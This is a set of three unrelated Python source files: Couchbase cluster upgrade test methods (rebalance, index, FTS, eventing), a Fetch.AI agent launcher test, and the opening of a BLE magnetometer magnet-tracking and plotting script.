self.nodes_in_list = list(self.out_servers_pool.values())[:self.nodes_in]
if int(self.nodes_in) == 1:
if len(list(free_nodes.keys())) > 1:
free_node_in = [list(free_nodes.values())[0]]
if len(self.after_upgrade_services_in) > 1:
service_in = [self.after_upgrade_services_in[0]]
else:
free_node_in = list(free_nodes.values())
self.log.info("<<<=== rebalance_in node {0} with services {1}"\
.format(free_node_in, service_in[0]))
rebalance = \
self.cluster.async_rebalance(self.servers[:self.nodes_init],
free_node_in,
[], services = service_in)
rebalance.result()
self.in_servers_pool.update(free_nodes)
rebalance_in = True
if any("index" in services for services in service_in):
self.log.info("Set storageMode to forestdb after add "
"index node {0} to cluster".format(list(free_nodes.keys())))
RestConnection(list(free_nodes.values())[0]).set_indexer_storage_mode()
if self.after_upgrade_services_in and \
len(self.after_upgrade_services_in) > 1:
self.log.info("remove service '{0}' from service list after "
"rebalance done ".format(self.after_upgrade_services_in[0]))
self.after_upgrade_services_in.pop(0)
self.sleep(10, "wait 10 seconds after rebalance")
if free_node_in and free_node_in[0] not in self.servers:
self.servers.append(free_node_in[0])
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if rebalance_in and queue is not None:
queue.put(True)
def rebalance_out(self, queue=None):
rebalance_out = False
try:
self.log.info("=====>>>> rebalance_out node {0}"\
.format(self.nodes_out_list))
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],\
[], self.nodes_out_list)
rebalance.result()
rebalance_out = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if rebalance_out and queue is not None:
queue.put(True)
def rebalance_in_out(self, queue=None):
rebalance_in_out = False
try:
self.nodes_in_list = list(self.out_servers_pool.values())[:self.nodes_in]
self.log.info("<<<<<===== rebalance_in node {0}"\
.format(self.nodes_in_list))
self.log.info("=====>>>>> rebalance_out node {0}"\
.format(self.nodes_out_list))
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],\
self.nodes_in_list, self.nodes_out_list,\
services = self.after_upgrade_services_in)
rebalance.result()
rebalance_in_out = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if rebalance_in_out and queue is not None:
queue.put(True)
def incremental_backup(self):
self.log.info("incremental_backup")
def full_backup(self):
self.log.info("full_backup")
def cb_collect_info(self):
try:
self.log.info("cb_collect_info")
log_file_name = "/tmp/sample.zip"
output, error = self.shell.execute_cbcollect_info("%s" % (log_file_name))
        except Exception as ex:
            self.log.info(ex)
            raise
def create_index(self, queue=None):
self.log.info("create_index")
self.index_list = {}
create_index = False
self._initialize_n1ql_helper()
try:
self.n1ql_helper.create_primary_index(using_gsi = True,
server = self.n1ql_server)
#self.n1ql_helper.create_primary_index(using_gsi = False,
# server = self.n1ql_server)
self.log.info("done create_index")
create_index = True
except Exception as e:
self.log.info(e)
if queue is not None:
queue.put(False)
if create_index and queue is not None:
queue.put(True)
def create_index_with_replica_and_query(self, queue=None):
""" ,groups=simple,reset_services=True
"""
self.log.info("Create index with replica and query")
self.n1ql_node = self.get_nodes_from_services_map(service_type="n1ql")
self._initialize_n1ql_helper()
self.index_name_prefix = "random_index_" + str(randint(100000, 999999))
create_index_query = "CREATE INDEX " + self.index_name_prefix + \
" ON default(age) USING GSI WITH {{'num_replica': {0}}};"\
.format(self.num_index_replicas)
try:
self.create_index()
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as e:
self.log.info(e)
self.sleep(30)
index_map = self.get_index_map()
self.log.info(index_map)
if not self.expected_err_msg:
self.n1ql_helper.verify_replica_indexes([self.index_name_prefix],
index_map,
self.num_index_replicas)
def verify_index_with_replica_and_query(self, queue=None):
index_map = self.get_index_map()
try:
self.n1ql_helper.verify_replica_indexes([self.index_name_prefix],
index_map,
self.num_index_replicas)
except Exception as e:
self.log.info(e)
if queue is not None:
queue.put(False)
def create_views(self, queue=None):
self.log.info("*** create_views ***")
""" default is 1 ddoc. Change number of ddoc by param ddocs_num=new_number
default is 2 views. Change number of views by param
view_per_ddoc=new_view_per_doc """
try:
self.create_ddocs_and_views(queue)
except Exception as e:
self.log.info(e)
def query_views(self, queue=None):
self.log.info("*** query_views ***")
try:
self.verify_all_queries(queue)
except Exception as e:
self.log.info(e)
def drop_views(self):
self.log.info("drop_views")
def drop_index(self):
self.log.info("drop_index")
for bucket_name in list(self.index_list.keys()):
query = "drop index {0} on {1} using gsi"\
.format(self.index_list[bucket_name], bucket_name)
self.n1ql_helper.run_cbq_query(query, self.n1ql_server)
def query_explain(self):
self.log.info("query_explain")
for bucket in self.buckets:
query = "select count(*) from {0}".format(bucket.name)
self.n1ql_helper.run_cbq_query(query, self.n1ql_server)
query = "explain select count(*) from {0}".format(bucket.name)
self.n1ql_helper.run_cbq_query(query, self.n1ql_server)
query = "select count(*) from {0} where field_1 = 1".format(bucket.name)
self.n1ql_helper.run_cbq_query(query, self.n1ql_server)
query = "explain select count(*) from {0} where field_1 = 1".format(bucket.name)
self.n1ql_helper.run_cbq_query(query, self.n1ql_server)
def change_settings(self):
try:
status = True
if "update_notifications" in self.input.test_params:
status &= self.rest.update_notifications(str(self.input.param("update_notifications", 'true')).lower())
if "autofailover_timeout" in self.input.test_params:
status &= self.rest.update_autofailover_settings(True, self.input.param("autofailover_timeout", None))
if "autofailover_alerts" in self.input.test_params:
status &= self.rest.set_alerts_settings('couchbase@localhost', 'root@localhost', 'user', 'pwd')
if "autocompaction" in self.input.test_params:
tmp, _, _ = self.rest.set_auto_compaction(viewFragmntThresholdPercentage=
self.input.param("autocompaction", 50))
status &= tmp
if not status:
self.fail("some settings were not set correctly!")
except Exception as ex:
self.log.info(ex)
raise
def create_eventing_services(self, queue=None):
""" Only work after cluster upgrade to 5.5.0 completely """
try:
rest = RestConnection(self.master)
cb_version = rest.get_nodes_version()
if 5.5 > float(cb_version[:3]):
self.log.info("This eventing test is only for cb version 5.5 and later.")
return
bucket_params = self._create_bucket_params(server=self.master, size=128,
replicas=self.num_replicas)
self.cluster.create_standard_bucket(name=self.src_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.buckets = RestConnection(self.master).get_buckets()
self.src_bucket = RestConnection(self.master).get_buckets()
self.cluster.create_standard_bucket(name=self.dst_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.cluster.create_standard_bucket(name=self.metadata_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.cluster.create_standard_bucket(name=self.dst_bucket_name1, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.cluster.create_standard_bucket(name=self.source_bucket_mutation_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.cluster.create_standard_bucket(name=self.dst_bucket_curl_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.buckets = RestConnection(self.master).get_buckets()
self.gens_load = self.generate_docs(self.docs_per_day)
self.expiry = 3
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
""" must be self.rest to pass in deploy_function"""
self.rest = RestConnection(self.restServer)
self.load(self.gens_load, buckets=self.buckets, flag=self.item_flag, verify_data=False,
batch_size=self.batch_size)
event = EventingHelper(servers=self.servers,master=self.master)
event.deploy_bucket_op_function()
event.verify_documents_in_destination_bucket('test_import_function_1', 1, 'dst_bucket')
event.undeploy_bucket_op_function()
event.deploy_curl_function()
event.verify_documents_in_destination_bucket('bucket_op_curl', 1, 'dst_bucket_curl')
event.undeploy_curl_function()
event.deploy_sbm_function()
event.verify_documents_in_destination_bucket('bucket_op_sbm', 1, 'source_bucket_mutation')
event.undeploy_sbm_function()
self.undeploy_and_delete_function(body)
except Exception as e:
self.log.info(e)
def create_cbas_services(self, queue=None):
"""
        This test only needs at most 4 servers to run and only upgrades to vulcan and later
Command to run:
upgrade.upgrade_tests.UpgradeTests.test_upgrade,items=5000,initial_version=4.6.4-xxxx,
nodes_init=3,initialize_events=kv_ops_initialize,upgrade_services_in='kv:index',
after_events=rebalance_in-create_cbas_services,after_upgrade_services_in=cbas,
dgm_run=true,upgrade_test=True,skip_init_check_cbserver=true,released_upgrade_version=5.5.0-xxx
"""
try:
self.validate_error = False
rest = RestConnection(self.master)
cb_version = rest.get_nodes_version()
if 5.5 > float(cb_version[:3]):
self.log.info("This analytic test is only for cb version 5.5 and later.")
return
self.log.info("Get cbas nodes in cluster")
cbas_node = self.get_nodes_from_services_map(service_type="cbas")
cbas_rest = RestConnection(self.servers[self.nodes_init])
self.get_services_map()
kv_nodes = copy.deepcopy(self.servers)
kv_maps = [x.replace(":8091", "") for x in self.services_map["kv"]]
self.log.info("Get kv node in cluster")
            kv_nodes = [node for node in kv_nodes if node.ip in kv_maps]
self.cbas_node = cbas_node
self.load_sample_buckets(servers=kv_nodes, bucketName="travel-sample",
total_items=31591, rest=cbas_rest)
self.test_create_dataset_on_bucket()
except Exception as e:
self.log.info(e)
if queue is not None:
queue.put(False)
if queue is not None:
queue.put(True)
def online_upgrade(self):
try:
self.log.info("online_upgrade")
self.initial_version = self.upgrade_versions[0]
self.sleep(self.sleep_time,
"Pre-setup of old version is done. "
"Wait for online upgrade to {0} version"
.format(self.initial_version))
self.product = 'couchbase-server'
if self.online_upgrade_type == "swap":
self.online_upgrade_swap_rebalance()
else:
self.online_upgrade_incremental()
except Exception as ex:
self.log.info(ex)
raise
def online_upgrade_swap_rebalance(self):
self.log.info("online_upgrade_swap_rebalance")
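        # Overview of the loop below: each pass installs the new version on
        # swap_num_servers spare nodes, swap-rebalances them in while taking the
        # same number of not-yet-upgraded nodes out (reusing the outgoing nodes'
        # services when upgrade_services_in == "same"), then rotates the server
        # pools so the next pass continues with the remaining old nodes.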
self.swap_num_servers = self.input.param('swap_num_servers', 1)
servers = self._convert_server_map(self.servers[:self.nodes_init])
out_servers = self._convert_server_map(self.servers[self.nodes_init:])
self.swap_num_servers = min(self.swap_num_servers, len(out_servers))
start_services_num = 0
for i in range(self.nodes_init // self.swap_num_servers):
servers_in = {}
new_servers = copy.deepcopy(servers)
servicesNodeOut = ""
for key in list(out_servers.keys()):
servers_in[key] = out_servers[key]
out_servers[key].upgraded = True
out_servers.pop(key)
if len(servers_in) == self.swap_num_servers:
break
servers_out = {}
node_out = None
new_servers.update(servers_in)
for key in list(servers.keys()):
if len(servers_out) == self.swap_num_servers:
break
elif not servers[key].upgraded:
servers_out[key] = servers[key]
new_servers.pop(key)
out_servers.update(servers_out)
rest = RestConnection(list(servers.values())[0])
self.log.info("****************************************".format(servers))
self.log.info("cluster nodes = {0}".format(list(servers.values())))
self.log.info("cluster service map = {0}".format(rest.get_nodes_services()))
self.log.info("cluster version map = {0}".format(rest.get_nodes_version()))
self.log.info("to include in cluster = {0}".format(list(servers_in.values())))
self.log.info("to exclude from cluster = {0}".format(list(servers_out.values())))
self.log.info("****************************************".format(servers))
rest = RestConnection(list(servers_out.values())[0])
servicesNodeOut = rest.get_nodes_services()
servicesNodeOut = ",".join(servicesNodeOut[list(servers_out.keys())[0]] )
self._install(list(servers_in.values()))
self.sleep(10, "Wait for ns server is ready")
old_vbucket_map = self._record_vbuckets(self.master, list(servers.values()))
try:
if self.upgrade_services_in == "same":
self.cluster.rebalance(list(servers.values()),
list(servers_in.values()),
list(servers_out.values()),
services=[servicesNodeOut])
elif self.upgrade_services_in is not None \
and len(self.upgrade_services_in) > 0:
tem_services = self.upgrade_services_in[
start_services_num:start_services_num
+ len(list(servers_in.values()))]
self.cluster.rebalance(list(servers.values()),
list(servers_in.values()),
list(servers_out.values()),
services=tem_services)
start_services_num += len(list(servers_in.values()))
else:
self.cluster.rebalance(list(servers.values()),
list(servers_in.values()),
list(servers_out.values()))
except Exception as ex:
self.log.info(ex)
raise
self.out_servers_pool = servers_out
self.in_servers_pool = new_servers
servers = new_servers
self.servers = list(servers.values())
self.master = self.servers[0]
if self.verify_vbucket_info:
new_vbucket_map = self._record_vbuckets(self.master, self.servers)
self._verify_vbuckets(old_vbucket_map, new_vbucket_map)
# in the middle of online upgrade events
if self.in_between_events:
self.event_threads = []
self.event_threads += self.run_event(self.in_between_events)
self.finish_events(self.event_threads)
self.in_between_events = None
def online_upgrade_incremental(self):
self.log.info("online_upgrade_incremental")
try:
for server in self.servers[1:]:
self.cluster.rebalance(self.servers, [], [server])
self.initial_version = self.upgrade_versions[0]
self.sleep(self.sleep_time, "Pre-setup of old version is done. Wait for online upgrade to {0} version".\
format(self.initial_version))
self.product = 'couchbase-server'
self._install([server])
self.sleep(self.sleep_time, "Installation of new version is done. Wait for rebalance")
self.cluster.rebalance(self.servers, [server], [])
self.log.info("Rebalanced in upgraded nodes")
self.sleep(self.sleep_time)
self._new_master(self.servers[1])
self.cluster.rebalance(self.servers, [], [self.servers[0]])
self.log.info("Rebalanced out all old version nodes")
except Exception as ex:
self.log.info(ex)
raise
def offline_upgrade(self):
if self.offline_upgrade_type == "offline_shutdown":
self._offline_upgrade()
elif self.offline_upgrade_type == "offline_failover":
self._offline_failover_upgrade()
def failover_add_back(self):
try:
rest = RestConnection(self.master)
recoveryType = self.input.param("recoveryType", "full")
servr_out = self.nodes_out_list
failover_task =self.cluster.async_failover([self.master],
failover_nodes = servr_out, graceful=self.graceful)
failover_task.result()
nodes_all = rest.node_statuses()
nodes = []
if servr_out[0].ip == "127.0.0.1":
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if (str(node.port) == failover_node.port)])
else:
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip])
for node in nodes:
self.log.info(node)
rest.add_back_node(node.id)
rest.set_recovery_type(otpNode=node.id, recoveryType=recoveryType)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [])
rebalance.result()
except Exception as ex:
raise
def auto_retry_with_rebalance_in(self, queue=None):
self.change_retry_rebalance_settings(True, 300, 1)
rebalance_in = False
service_in = copy.deepcopy(self.after_upgrade_services_in)
if service_in is None:
service_in = ["kv"]
free_nodes = self._convert_server_map(self._get_free_nodes())
free_node_in = []
if not free_nodes.values():
raise Exception("No free node available to rebalance in")
try:
            self.nodes_in_list = list(self.out_servers_pool.values())[:self.nodes_in]
if int(self.nodes_in) == 1:
if len(free_nodes.keys()) > 1:
                    free_node_in = [list(free_nodes.values())[0]]
if len(self.after_upgrade_services_in) > 1:
service_in = [self.after_upgrade_services_in[0]]
else:
                free_node_in = list(free_nodes.values())
self.log.info("<<<=== rebalance_in node {0} with services {1}" \
.format(free_node_in, service_in[0]))
shell = RemoteMachineShellConnection(free_node_in[0])
shell.stop_server()
rebalance = \
self.cluster.async_rebalance(self.servers[:self.nodes_init],
free_node_in,
[], services=service_in)
rebalance.result()
self.in_servers_pool.update(free_nodes)
rebalance_in = True
if any("index" in services for services in service_in):
self.log.info("Set storageMode to forestdb after add "
"index node {0} to cluster".format(free_nodes.keys()))
RestConnection(free_nodes.values()[0]).set_indexer_storage_mode()
if self.after_upgrade_services_in and \
len(self.after_upgrade_services_in) > 1:
self.log.info("remove service '{0}' from service list after "
"rebalance done ".format(self.after_upgrade_services_in[0]))
self.after_upgrade_services_in.pop(0)
self.sleep(10, "wait 10 seconds after rebalance")
if free_node_in and free_node_in[0] not in self.servers:
self.servers.append(free_node_in[0])
except Exception as ex:
self.log.info("Rebalance failed with : {0}".format(str(ex)))
self.check_retry_rebalance_succeeded()
if queue is not None:
queue.put(False)
else:
self.fail("Rebalance did not fail as expected. Hence could not validate auto-retry feature..")
finally:
self.start_server(free_node_in[0])
if rebalance_in and queue is not None:
queue.put(True)
def kv_ops_initialize(self, queue=None):
try:
self.log.info("kv_ops_initialize")
self._load_all_buckets(self.master, self.gen_initial_create,
"create", self.expire_time,
flag=self.item_flag)
self.log.info("done kv_ops_initialize")
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
raise
if queue is not None:
queue.put(True)
def kv_after_ops_create(self, queue=None):
try:
self.log.info("kv_after_ops_create")
self._load_all_buckets(self.master, self.after_gen_create, "create",\
self.expire_time, flag=self.item_flag)
for bucket in self.buckets:
self.log.info(" record vbucket for the bucket {0}"\
.format(bucket.name))
curr_items = \
RestConnection(self.master).get_active_key_count(bucket.name)
self.log.info("{0} curr_items in bucket {1} "\
.format(curr_items, bucket.name))
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if queue is not None:
queue.put(True)
def kv_after_ops_update(self):
try:
self.log.info("kv_after_ops_update")
self._load_all_buckets(self.master, self.after_gen_update, "update",
self.expire_time, flag=self.item_flag)
except Exception as ex:
self.log.info(ex)
raise
def kv_after_ops_delete(self):
try:
self.log.info("kv_after_ops_delete")
self._load_all_buckets(self.master, self.after_gen_delete,
"delete", self.expire_time,
flag=self.item_flag)
except Exception as ex:
self.log.info(ex)
raise
def doc_ops_initialize(self, queue=None):
try:
self.log.info("load doc to all buckets")
self._load_doc_data_all_buckets(data_op="create", batch_size=1000,
gen_load=None)
self.log.info("done initialize load doc to all buckets")
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if queue is not None:
queue.put(True)
def kv_ops_create(self):
try:
self.log.info("kv_ops_create")
self._load_all_buckets(self.master, self.gen_create, "create",
self.expire_time, flag=self.item_flag)
except Exception as ex:
self.log.info(ex)
raise
def kv_ops_update(self):
try:
self.log.info("kv_ops_update")
self._load_all_buckets(self.master, self.gen_update, "update",
self.expire_time, flag=self.item_flag)
except Exception as ex:
self.log.info(ex)
raise
def kv_ops_delete(self):
try:
self.log.info("kv_ops_delete")
self._load_all_buckets(self.master, self.gen_delete, "delete",
self.expire_time, flag=self.item_flag)
except Exception as ex:
self.log.info(ex)
raise
def add_sub_doc(self):
try:
self.log.info("add sub doc")
"""add sub doc code here"""
except Exception as ex:
self.log.info(ex)
raise
def create_fts_index(self, queue=None):
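        # Build a default full-text index definition for the first bucket,
        # (re)create it on an FTS node, then run mixed doc ops so the index has
        # data to ingest.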
try:
self.log.info("Checking if index already exists ...")
name = "default"
""" test on one bucket """
for bucket in self.buckets:
name = bucket.name
break
SOURCE_CB_PARAMS = {
"authUser": "default",
"authPassword": "",
"authSaslUser": "",
"authSaslPassword": "",
"clusterManagerBackoffFactor": 0,
"clusterManagerSleepInitMS": 0,
"clusterManagerSleepMaxMS": 20000,
"dataManagerBackoffFactor": 0,
"dataManagerSleepInitMS": 0,
"dataManagerSleepMaxMS": 20000,
"feedBufferSizeBytes": 0,
"feedBufferAckThreshold": 0
}
self.index_type = 'fulltext-index'
self.index_definition = {
"type": "fulltext-index",
"name": "",
"uuid": "",
"params": {},
"sourceType": "couchbase",
"sourceName": "",
"sourceUUID": "",
"sourceParams": SOURCE_CB_PARAMS,
"planParams": {}
}
self.name = self.index_definition['name'] = \
self.index_definition['sourceName'] = name
fts_node = self.get_nodes_from_services_map(
"fts", servers=self.get_nodes_in_cluster_after_upgrade())
if fts_node:
rest = RestConnection(fts_node)
status, _ = rest.get_fts_index_definition(self.name)
if status != 400:
rest.delete_fts_index(self.name)
self.log.info("Creating {0} {1} on {2}"
.format(self.index_type, self.name, rest.ip))
rest.create_fts_index(self.name, self.index_definition)
else:
raise("No FTS node in cluster")
self.ops_dist_map = self.calculate_data_change_distribution(
create_per=self.create_ops_per, update_per=self.update_ops_per,
delete_per=self.delete_ops_per, expiry_per=self.expiry_ops_per,
start=0, end=self.docs_per_day)
self.log.info(self.ops_dist_map)
self.dataset = "default"
self.docs_gen_map = self.generate_ops_docs(self.docs_per_day, 0)
self.async_ops_all_buckets(self.docs_gen_map, batch_size=100)
except Exception as ex:
self.log.info(ex)
def create_fts_index_query(self, queue=None):
try:
self.fts_obj = self.create_fts_index_query_compare()
return self.fts_obj
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if queue is not None:
queue.put(True)
def xdcr_create_replication(self):
try:
self.xdcr_handle._create_replication()
except Exception as ex:
self.log.info(ex)
def xdcr_set_replication_properties(self):
try:
param_str = self.__input.param(
"%s@%s" %
("default", "C"), None)
self.xdcr_handle._set_replication_properties(param_str)
except Exception as ex:
self.log.info(ex)
def xdcr_get_replication_properties(self):
try:
self.xdcr_handle._get_replication_properties()
except Exception as ex:
self.log.info(ex)
def create_n1ql_index_query(self, queue=None):
try:
self.create_n1ql_index_and_query()
#return self.n1ql_obj
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if queue is not None:
queue.put(True)
def cluster_stats(self, servers):
self._wait_for_stats_all_buckets(servers)
def _initialize_n1ql_helper(self):
if self.n1ql_helper is None:
self.n1ql_server = self.get_nodes_from_services_map(
service_type="n1ql", servers=self.input.servers)
self.n1ql_helper = N1QLHelper(
version="sherlock", shell=None,
use_rest=True, max_verify=self.max_verify,
buckets=self.buckets, item_flag=None,
n1ql_port=self.n1ql_server.n1ql_port, full_docs_list=[],
log=self.log, input=self.input, master=self.master)
def _get_free_nodes(self):
self.log.info("Get free nodes in pool not in cluster yet")
nodes = self.get_nodes_in_cluster_after_upgrade()
free_nodes = copy.deepcopy(self.input.servers)
for node in nodes:
for server in free_nodes:
if str(server.ip).strip() == str(node.ip).strip():
self.log.info("this node {0} is in cluster".format(server))
free_nodes.remove(server)
if not free_nodes:
self.log.info("No free node")
else:
self.log.info("Here is the list of free nodes {0}"
.format(free_nodes))
return free_nodes
def get_nodes_in_cluster_after_upgrade(self, master_node=None):
if master_node is None:
rest = RestConnection(self.master)
else:
rest = RestConnection(master_node)
nodes = rest.node_statuses()
server_set = []
for node in nodes:
for server in self.input.servers:
if server.ip == node.ip:
server_set.append(server)
return server_set
class UpgradeEventTests(UpgradeTests, EventingBaseTest):
pass
|
test_launcher.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains tests for aea launcher."""
import shutil
import time
from multiprocessing import Event
from pathlib import Path
from threading import Thread
from unittest.mock import patch
import pytest
import yaml
from aea.configurations.base import DEFAULT_AEA_CONFIG_FILE
from aea.launcher import AEADirMultiprocessTask, AEALauncher, _run_agent
from aea.test_tools.test_cases import AEATestCaseMany
from tests.common.utils import wait_for_condition
from tests.conftest import CUR_PATH
class TestThreadLauncherMode(AEATestCaseMany):
"""Test launcher in threaded mode."""
RUNNER_MODE = "threaded"
agent_name_1 = "myagent_1"
agent_name_2 = "myagent_2"
failing_agent = "failing_agent"
@classmethod
def setup_class(cls):
"""Set the test up."""
super(AEATestCaseMany, cls).setup_class()
cls.create_agents(cls.agent_name_1, cls.agent_name_2, cls.failing_agent)
cls.set_agent_context(cls.failing_agent)
shutil.copytree(
Path(CUR_PATH, "data", "exception_skill"),
Path(cls.t, cls.failing_agent, "skills", "exception"),
)
config_path = Path(cls.t, cls.failing_agent, DEFAULT_AEA_CONFIG_FILE)
with open(config_path) as fp:
config = yaml.safe_load(fp)
config.setdefault("skills", []).append("fetchai/exception:0.1.0")
        with open(config_path, "w") as fp:
            yaml.safe_dump(config, fp)
cls.unset_agent_context()
for agent_name in (cls.agent_name_1, cls.agent_name_2, cls.failing_agent):
cls.set_agent_context(agent_name)
cls.generate_private_key()
cls.add_private_key()
cls.set_runtime_mode_to_async(agent_name)
cls.unset_agent_context()
@classmethod
def set_runtime_mode_to_async(cls, agent_name: str) -> None:
"""Set runtime mode of the agent to async."""
config_path = Path(cls.t, agent_name, DEFAULT_AEA_CONFIG_FILE)
with open(config_path) as fp:
config = yaml.safe_load(fp)
config.setdefault("runtime_mode", "async")
with open(config_path, "w") as fp:
yaml.safe_dump(config, fp)
def test_start_stop(self) -> None:
"""Test agents started stopped."""
try:
runner = AEALauncher(
[self.agent_name_1, self.agent_name_2], self.RUNNER_MODE
)
runner.start(True)
wait_for_condition(lambda: runner.is_running, timeout=10)
assert runner.num_failed == 0
finally:
runner.stop()
assert not runner.is_running
assert runner.num_failed == 0
def test_one_fails(self) -> None:
"""Test agents started, one agent failed, exception is raised."""
try:
runner = AEALauncher(
[self.agent_name_1, self.agent_name_2, self.failing_agent],
self.RUNNER_MODE,
)
with pytest.raises(Exception, match="Expected exception!"):
runner.start()
finally:
runner.stop()
def test_run_agent_in_thread(self):
"""Test agent started and stopped in thread."""
stop_event = Event()
t = Thread(target=_run_agent, args=(self.agent_name_1, stop_event))
t.start()
time.sleep(1)
stop_event.set()
t.join()
class TestAsyncLauncherMode(TestThreadLauncherMode):
"""Test launcher in async mode."""
RUNNER_MODE = "async"
class TestProcessLauncherMode(TestThreadLauncherMode):
"""Test launcher in process mode."""
RUNNER_MODE = "multiprocess"
def test_task_stop():
"""Test AEADirMultiprocessTask.stop when not started."""
task = AEADirMultiprocessTask("some")
assert not task.failed
with patch.object(task._stop_event, "set") as set_mock:
task.stop()
set_mock.assert_not_called()
|
real_time_pos.py
|
import asyncio
import atexit
import datetime
import multiprocessing
import os
import queue
import random
import struct
import sys
import time
from itertools import count
from multiprocessing import Pool
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from bleak import BleakClient
from bleak import exc
from codetiming import Timer
from matplotlib.animation import FuncAnimation
from src.solver import Solver_jac, Solver
from src.filter import Magnet_KF, Magnet_UKF
from src.preprocess import Calibrate_Data
from config import pSensor_smt, pSensor_large_smt, pSensor_small_smt, pSensor_median_smt, pSensor_imu
import cppsolver as cs
'''Parameters the user should change accordingly'''
# Change pSensor if a different sensor layout is used
pSensor = pSensor_large_smt
# Change this parameter for different initial value for 1 magnet
params = np.array([40 / np.sqrt(2) * 1e-6, 40 / np.sqrt(2) * 1e-6,
0, np.log(3), 1e-2 * (-2), 1e-2 * (2), 1e-2 * (11), 0, 0])
# Change this parameter for different initial value for 2 magnets
params2 = np.array([
40 / np.sqrt(2) * 1e-6, 40 / np.sqrt(2) * 1e-6, 0, np.log(3),
1e-2 * 6, 1e-2 * 0, 1e-2 * (-1), 0, 0,
1e-2 * 5, 1e-2 * (4), 1e-2 * (-1), 0, 0,
])
# Your Adafruit nRF52832 BLE address
ble_address = "2A59A2D4-BCD8-4AF7-B750-E51195C1CA13"
# Absolute or relative path to the calibration data, stored in CSV
cali_path = 'Path to the calibration data, stored in CSV'
'''The calculation and visualization process'''
t = 0
matplotlib.use('Qt5Agg')
# Nordic NUS characteristic for RX, which should be writable
UART_RX_UUID = "6e400002-b5a3-f393-e0a9-e50e24dcca9e"
# Nordic NUS characteristic for TX, which should be readable
UART_TX_UUID = "6e400003-b5a3-f393-e0a9-e50e24dcca9e"
result = []
worklist = multiprocessing.Manager().Queue()
results = multiprocessing.Manager().Queue()
results2 = multiprocessing.Manager().Queue()
def end():
print('End of the program')
sys.exit(0)
def calculation_parallel(magcount=1, use_kf=0, use_wrist=False):
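    # Worker process: pulls raw magnetometer frames from the shared worklist
    # queue, runs the cppsolver fit seeded with the previous solution, and pushes
    # the estimated magnet position(s) (in cm) to the results queues. If the
    # previous solution drifts out of range (> 1 m on any axis), it restarts from
    # the initial guess in params/params2.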
global worklist
global params
global params2
global results
global results2
global pSensor
myparams1 = params
myparams2 = params2
while True:
if not worklist.empty():
datai = worklist.get()
datai = datai.reshape(-1, 3)
# resulti [gx, gy, gz, m, x0,y0,z0, theta0, phy0, x1, y1, z1, theta1, phy1]
if magcount == 1:
if np.max(np.abs(myparams1[4:7])) > 1:
myparams1 = params
resulti = cs.solve_1mag(
datai.reshape(-1), pSensor.reshape(-1), myparams1)
myparams1 = resulti
result = [resulti[4] * 1e2,
resulti[5] * 1e2, resulti[6] * 1e2]
results.put(result)
print("Position: {:.2f}, {:.2f}, {:.2f}, dis={:.2f}".format(
result[0],
result[1],
result[2],
np.sqrt(
result[0] ** 2 + result[1] ** 2 + result[2] ** 2)))
elif magcount == 2:
if np.max(
np.abs(myparams2[4: 7])) > 1 or np.max(
np.abs(myparams2[9: 12])) > 1:
myparams2 = params2
resulti = cs.solve_2mag(
datai.reshape(-1), pSensor.reshape(-1), myparams2)
myparams2 = resulti
result = [resulti[4] * 1e2,
resulti[5] * 1e2, resulti[6] * 1e2]
results.put(result)
result2 = [resulti[9] * 1e2,
resulti[10] * 1e2, resulti[11] * 1e2]
results2.put(result2)
print(
"Mag 1 Position: {:.2f}, {:.2f}, {:.2f}, dis={:.2f} \n Mag 2 Position: {:.2f}, {:.2f}, {:.2f}, dis={:.2f}". format(
result[0],
result[1],
result[2],
np.sqrt(
result[0] ** 2 +
result[1] ** 2 +
result[2] ** 2),
result2[0],
result2[1],
result2[2],
np.sqrt(
result2[0] ** 2 +
result2[1] ** 2 +
result2[2] ** 2)))
async def task(name, work_queue):
timer = Timer(text=f"Task {name} elapsed time: {{: .1f}}")
while not work_queue.empty():
delay = await work_queue.get()
print(f"Task {name} running")
timer.start()
await asyncio.sleep(delay)
timer.stop()
async def show_mag(magcount=1):
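    # Live 3D visualization using blitting: the static background (axes and
    # sensor layout) is cached once, then each frame restores it and redraws only
    # the trace of the last 30 estimated positions on top of it.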
global t
global pSensor
global results
global results2
myresults = np.array([[0, 0, 10]])
myresults2 = np.array([[0, 0, 10]])
fig = plt.figure(figsize=(5, 5))
ax = fig.gca(projection='3d')
# TODO: add title
ax.set_xlabel('x(cm)')
ax.set_ylabel('y(cm)')
ax.set_zlabel('z(cm)')
ax.set_xlim([-20, 20])
ax.set_ylim([-20, 20])
ax.set_zlim([-10, 40])
Xs = 1e2 * pSensor[:, 0]
Ys = 1e2 * pSensor[:, 1]
Zs = 1e2 * pSensor[:, 2]
